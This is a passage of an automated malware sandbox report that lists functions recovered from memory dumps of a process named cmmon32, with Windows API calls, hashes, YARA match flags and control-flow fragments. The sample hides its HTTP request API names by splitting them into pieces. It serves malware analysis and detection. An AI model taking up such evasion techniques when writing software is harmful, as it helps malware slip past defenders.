                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: a002357f8342f749a62454ad6d18d609ad189466aa7955ba1965f6bf27cce223
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: B2F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248FA1D97241C630E8118BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA3FA Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(001B4D62,5EB65239,FFFFFFFF,001B4A21,?,?,001B4D62,?,001B4A21,FFFFFFFF,5EB65239,001B4D62,?,00000000), ref: 001BA445
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 5672a91aa68cca2b2d74b8d9eb1d5a630faaeebb51886134e23761c2c36fda9a
                                          • Instruction ID: ffe3be5d8ea094ae24d3ad919caafc4443284b1ef72b2c2e60132c2c1d117653
                                          • Opcode Fuzzy Hash: 5672a91aa68cca2b2d74b8d9eb1d5a630faaeebb51886134e23761c2c36fda9a
                                          • Instruction Fuzzy Hash: 68F0F4B2200108AFCB14CFA9CC81EEB77A9EF8C354F158248FA5DA7241D630E815CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA400 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtReadFile.NTDLL(001B4D62,5EB65239,FFFFFFFF,001B4A21,?,?,001B4D62,?,001B4A21,FFFFFFFF,5EB65239,001B4D62,?,00000000), ref: 001BA445
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: e3a6b9dea92fa509da8ab5b93b9d768368c165a4471135733c3fa9ee57d34a63
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: DFF0A4B2200208AFCB14DF89DC81EEB77ADAF8C754F158248BA1D97241D630E8118BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,001A2D11,00002000,00003000,00000004), ref: 001BA569
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: 2581673fe44e6d95a330981fc314b6a3aa9902836072ab0fae1fa2866194310c
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: E1F015B2200208AFCB14DF89CC81EEB77ADAF88754F118148FE1C97241C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA47D Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(001B4D40,?,?,001B4D40,00000000,FFFFFFFF), ref: 001BA4A5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 02c654e44495fff70c080f42990a3cc4fb93de1eb60935d63907cf671cc2ea0e
                                          • Instruction ID: 38273ba24d8609b3b7fb0c457b71ae1e72cb7c56ea6bd49e89390bfd5546cd1f
                                          • Opcode Fuzzy Hash: 02c654e44495fff70c080f42990a3cc4fb93de1eb60935d63907cf671cc2ea0e
                                          • Instruction Fuzzy Hash: 4DD012752101107FE714EF94CC45EE77769EF44350F554459B95C9B242C630E51487A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BA480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • NtClose.NTDLL(001B4D40,?,?,001B4D40,00000000,FFFFFFFF), ref: 001BA4A5
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: d6d0edd660ca070ca4fb05ba36897f68e1522049959d92dd566c28c57e48638a
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: 21D01776200214BBD710EB98CC85EEB7BACEF48760F154499BA5C9B242C630FA0086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e6309f1e938ada43c2849b4ddc31c29888ca853d0b6fa21fbf6e2e8a34c2af91
                                          • Instruction ID: dd58242da3b70f2703891d01d715ab912d5631a7ef694d930f875a28fec7c0b1
                                          • Opcode Fuzzy Hash: e6309f1e938ada43c2849b4ddc31c29888ca853d0b6fa21fbf6e2e8a34c2af91
                                          • Instruction Fuzzy Hash: 49900261282041627545B159441450B4057B7E02857D1C012A1405990C8966E86AF661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a8179148be043d3122f7306db4322d8d160463a53f91ba347cf61c13cac16257
                                          • Instruction ID: ce015ce0fc7b97a1d167527cbc3d34b8bf9ad7c12f8a29b3e25ed17f9f8fc1a0
                                          • Opcode Fuzzy Hash: a8179148be043d3122f7306db4322d8d160463a53f91ba347cf61c13cac16257
                                          • Instruction Fuzzy Hash: 2490027124100423F1117159451470B005AA7D0285FD1C412A0415598D9A96D966B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1e9392a837daf9cca623a2419c4934f160ade27db4590439fd6c7eeb63e9bf59
                                          • Instruction ID: 997968fcd0c12df5b0dc43e01cecf58e31f7373aa57ecb0ecca7ea7ba7dbf8d3
                                          • Opcode Fuzzy Hash: 1e9392a837daf9cca623a2419c4934f160ade27db4590439fd6c7eeb63e9bf59
                                          • Instruction Fuzzy Hash: DD900265251000132105B559071450B0097A7D5395391C021F1006590CDA61D8757161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 20be061a11e7bd96bd7c40781e5467998ce93deb14d71ff2fc72d016bba27fe9
                                          • Instruction ID: 07013c071b6da1b189d5f56c5111a0e355802b2d2fa0f64ec04721c696693fdb
                                          • Opcode Fuzzy Hash: 20be061a11e7bd96bd7c40781e5467998ce93deb14d71ff2fc72d016bba27fe9
                                          • Instruction Fuzzy Hash: CD9002B124100412F1407159441474A0056A7D0345F91C011A5055594E8A99DDE976A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 045995D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 09d4785697a83959dc6ac46da9b596a994ba1c960e837cae3dfe5cbfdc90f851
                                          • Instruction ID: e6bad2d43d7c007bde376cbd0f853c5ca8c8c098de24b9e410d3e6f38eca4962
                                          • Opcode Fuzzy Hash: 09d4785697a83959dc6ac46da9b596a994ba1c960e837cae3dfe5cbfdc90f851
                                          • Instruction Fuzzy Hash: 449002A12420001361057159442461A405BA7E0245B91C021E10055D0DC965D8A57165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 045999A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c9da3485100775684a491632767c76b7fdfcd8db9f19fd57b2f97b5e77b076c6
                                          • Instruction ID: 64f1661c4551793af65f077a1603280ffbc3a8f2d58ac12a70a1ce7f1afc5603
                                          • Opcode Fuzzy Hash: c9da3485100775684a491632767c76b7fdfcd8db9f19fd57b2f97b5e77b076c6
                                          • Instruction Fuzzy Hash: 6C9002A138100452F10071594424B0A0056E7E1345F91C015E1055594D8A59DC667166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 64363ee42b9743d47f7dc150d5f25f0e2c9b35ef2d691d07e6792ffe80bcd832
                                          • Instruction ID: 8b83a86463fe1f757e74f4b60f56b1bbb3888f4d1ef83936043db0a1c1c979ad
                                          • Opcode Fuzzy Hash: 64363ee42b9743d47f7dc150d5f25f0e2c9b35ef2d691d07e6792ffe80bcd832
                                          • Instruction Fuzzy Hash: D390026125180052F20075694C24B0B0056A7D0347F91C115A0145594CCD55D8757561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: fecab178e5245c1f603b865157c3ad665c56802232c343cbc857b8d67e6ff59b
                                          • Instruction ID: 5a0223a9683bbfeb15a9df743ee910345ce15ba226b08b749caef6ed5e3c480d
                                          • Opcode Fuzzy Hash: fecab178e5245c1f603b865157c3ad665c56802232c343cbc857b8d67e6ff59b
                                          • Instruction Fuzzy Hash: 0490027124504852F14071594414A4A0066A7D0349F91C011A00556D4D9A65DD69B6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d5fca90382ecdb32b9954caee126aea47e2b5194e5591171020b0cc26d85b202
                                          • Instruction ID: 16db8391d92deca6aebb20a1c0df804f2528af6451aaa0643674e3f2dcad92e7
                                          • Opcode Fuzzy Hash: d5fca90382ecdb32b9954caee126aea47e2b5194e5591171020b0cc26d85b202
                                          • Instruction Fuzzy Hash: 8D90027124100812F1807159441464E0056A7D1345FD1C015A0016694DCE55DA6D77E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 045996D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a5133d9d4b5b11de07a0809ed9f9064b8b7c1b1be858e4916ee802a479bc5f8c
                                          • Instruction ID: 76cb26be4625b18a99d9d0eecd128b0c77ca8fa7df57693586a412ea9bf93a1d
                                          • Opcode Fuzzy Hash: a5133d9d4b5b11de07a0809ed9f9064b8b7c1b1be858e4916ee802a479bc5f8c
                                          • Instruction Fuzzy Hash: 9F90027124100852F10071594414B4A0056A7E0345F91C016A0115694D8A55D8657561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 045996E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7b348a1e993ac1ebf496a2d9685fbccb5f9449be20ad3c9131f4879c3b74d43a
                                          • Instruction ID: dee55cd0b111ba0db625536df936c7c0c1998fecc8f4d746b921f0a2325b537c
                                          • Opcode Fuzzy Hash: 7b348a1e993ac1ebf496a2d9685fbccb5f9449be20ad3c9131f4879c3b74d43a
                                          • Instruction Fuzzy Hash: DB90027124108812F1107159841474E0056A7D0345F95C411A4415698D8AD5D8A57161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 45cc06b75e122ee50e4fe89d62cf8678b3067330e876945607e445cdf61f8c42
                                          • Instruction ID: 4413adcf74855f0c6966cdea96ea8b13bb085c0b3dd110fa0289056792c421f4
                                          • Opcode Fuzzy Hash: 45cc06b75e122ee50e4fe89d62cf8678b3067330e876945607e445cdf61f8c42
                                          • Instruction Fuzzy Hash: 4D90027124100412F1007599541864A0056A7E0345F91D011A5015595ECAA5D8A57171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 006a147dab463be45a531177a18ed0251c9a7d1aa7e0bc82308b0193beba14c9
                                          • Instruction ID: 7b0676537ea947e5740cd48367e2e07e568c507fa569cb6526435dec5bebc72a
                                          • Opcode Fuzzy Hash: 006a147dab463be45a531177a18ed0251c9a7d1aa7e0bc82308b0193beba14c9
                                          • Instruction Fuzzy Hash: 4090027135114412F1107159841470A0056A7D1245F91C411A0815598D8AD5D8A57162
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04599780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.901741866.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Offset: 04530000, based on PE: true
                                          • Associated: 00000007.00000002.901741866.000000000464B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000007.00000002.901741866.000000000464F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_4530000_cmmon32.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 2303ca8cd46126d699d90b74844fa0a90c08660eb31d8afaca16ccadf08fd06d
                                          • Instruction ID: 44e0dc37ea7feef6ddb0288082aa3844b2fde11e722faa2a39bce2b9c22b35b3
                                          • Opcode Fuzzy Hash: 2303ca8cd46126d699d90b74844fa0a90c08660eb31d8afaca16ccadf08fd06d
                                          • Instruction Fuzzy Hash: BD90026925300012F1807159541860E0056A7D1246FD1D415A0006598CCD55D87D7361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BAA60 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 107 1baa60-1baa96 108 1baa9f-1baaa6 107->108 109 1baa9a call 1bb000 107->109 110 1baaa8-1baace HttpOpenRequestA 108->110 111 1baacf-1baad5 108->111 109->108
                                          APIs
                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 001BAAC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                          • API String ID: 1984915467-4016285707
                                          • Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                          • Instruction ID: 0c2283208b94ef98ff673b5763994eb1e4a7f6b02cf00133ef98395e4cbce623
                                          • Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
                                          • Instruction Fuzzy Hash: 7501E5B2A05159AFCB04DF98D981DEF7BB9EB48210F158288FD08A7205D770EE10CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BAA59 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 112 1baa59-1baaa6 call 1bb000 115 1baaa8-1baace HttpOpenRequestA 112->115 116 1baacf-1baad5 112->116
                                          APIs
                                          • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 001BAAC8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpOpenRequest
                                          • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                          • API String ID: 1984915467-4016285707
                                          • Opcode ID: f672e249bd4055671e4235668cb629d03025d6934c127caf2f036378c663b042
                                          • Instruction ID: 951b288fc273943a265e8fd19002789b1bfcfaf75e4b4f3122bcbeac6b88a25c
                                          • Opcode Fuzzy Hash: f672e249bd4055671e4235668cb629d03025d6934c127caf2f036378c663b042
                                          • Instruction Fuzzy Hash: 6301E5B2905159AFCB14DF98D981DEF7BB9EF48210F158288FE59A7205D730AE10CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BAAE0 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 117 1baae0-1bab16 118 1bab1f-1bab26 117->118 119 1bab1a call 1bb000 117->119 120 1bab28-1bab42 HttpSendRequestA 118->120 121 1bab43-1bab49 118->121 119->118
                                          APIs
                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 001BAB3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                          • API String ID: 360639707-2503632690
                                          • Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                          • Instruction ID: 2ccf77d5ae054fe4ca626e8649b2bb7fa17381558b86ba4a6c7e7572563a5ab1
                                          • Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
                                          • Instruction Fuzzy Hash: D1014FB290511DAFCB00DF98D841AEFBBB8EB58210F148189FD18A7204D770EE10CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001BAAD6 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 41networkCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 122 1baad6-1bab26 call 1bb000 125 1bab28-1bab42 HttpSendRequestA 122->125 126 1bab43-1bab49 122->126
                                          APIs
                                          • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 001BAB3C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.900903995.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1a0000_cmmon32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HttpRequestSend
                                          • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                          • API String ID: 360639707-2503632690
                                          • Opcode ID: a6fe3ca46ba20cccab80a80165209eacdf6717efa73a70dc85e6f7235329a7ab
                                          • Instruction ID: 26f7a5b91b1702f62aa2791aff4abf11972d425c9782940556836b67cb55e2d4
